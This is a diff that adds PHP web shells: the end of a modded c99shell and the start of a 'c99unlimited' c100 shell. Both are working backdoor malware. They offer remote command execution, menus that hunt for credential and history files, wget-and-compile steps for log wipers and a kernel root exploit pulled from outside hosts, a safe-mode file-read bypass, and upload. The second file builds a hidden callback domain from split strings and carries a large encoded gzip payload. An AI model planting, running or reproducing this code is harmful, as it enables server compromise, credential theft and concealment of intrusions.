+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>Enter Directory </b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <b>Access File</b>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#333333 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell modded by <a href=http://w4ck1ng.com class="style1">w4ck1ng</a>. | <? echo("$shver"); ?> | Page generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</p></td></tr></table>
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/php/c99unlimited.php b/php/c99unlimited.php
new file mode 100644
index 0000000..9649c42
--- /dev/null
+++ b/php/c99unlimited.php
@@ -0,0 +1,3577 @@
+<?php
+
+/******************************************************************************************
+*  Locus7s Modified c100 Shell                                                                 
+*  Beta v. 1.0a - Project x2300                                                                   
+*  Written by md5cracking.com                                                          
+*  Modified by Shadow & Preddy                                                              
+*  Edited By KingDefacer                                                       
+*========================================================
+*  New Modifications Implemented --                                                      
++--------------------------------------------------------+
+*  -Added link to Enumerate to escalate priviledges      
+*  -Added Rootshell.c                                     
+*  -Added Rootshell.c;auto-compiler                      
+*  -Execute Rootshell.c                                  
+*  -Added Mig-Log Logcleaner                             
+*  -Execute Mig-Log Logcleaner                           
+*  -milw0rm searcher (Grabs OS and searches milw0rm)    
+*  -Locus7s Style & Image                                
+*  -Added w4ck1ng Shell Backdoor Connect and Backdoor    
+*  -Added PHP-Proxy link to hide your ass                
+*  -Added your ip and server ip with whois capability    
+*  -Added private 0day released by allahaka which utilizes the linux
+*   sudo bash to execute a stack overflow.
+*========================================================
+$y1 = 'ev';
+*  FEB. 14, 2007 RELEASE NOTES:                          
++--------------------------------------------------------+
+*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     
+*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           
+*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP.
+*========================================================
+*  PRODUCT INFO:                                         
++--------------------------------------------------------+
+*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    
+*  WWW.CCTEAM.RU   
+                               
+*  C100 SHELL - REVAMPED (X2300) MODIFIED BY KINGDEFACER    
+*  UNDERGROUND NETWORK | WWW.ALTURKS.COM                 
+*  \E0T/                                                 
+*********************************************************/
+
+//for php proxy purposes
+
+function selfURL() { $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : ""; $protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s; $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]); return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }
+$selfurl = base64_encode(selfURL());
+$phprox="http://twofaced.org/proxy/index.php?q=".$selfurl;
+
+//end of link
+$y2 = 'ilc';
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV))
+{
+$Lversion=substr($Lversion,0,6);
+$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+}else{
+$Lversion=substr($Lversion,0,3);
+$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+$y3 = '0de';
+
+//w4ck1ng Shell
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+global $disablefunc;
+$result = "";
+if (!empty($cmd))
+{
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+}
+return $result;
+}
+}
+}
+$y4 = 'r.com';
+$proxy_shit="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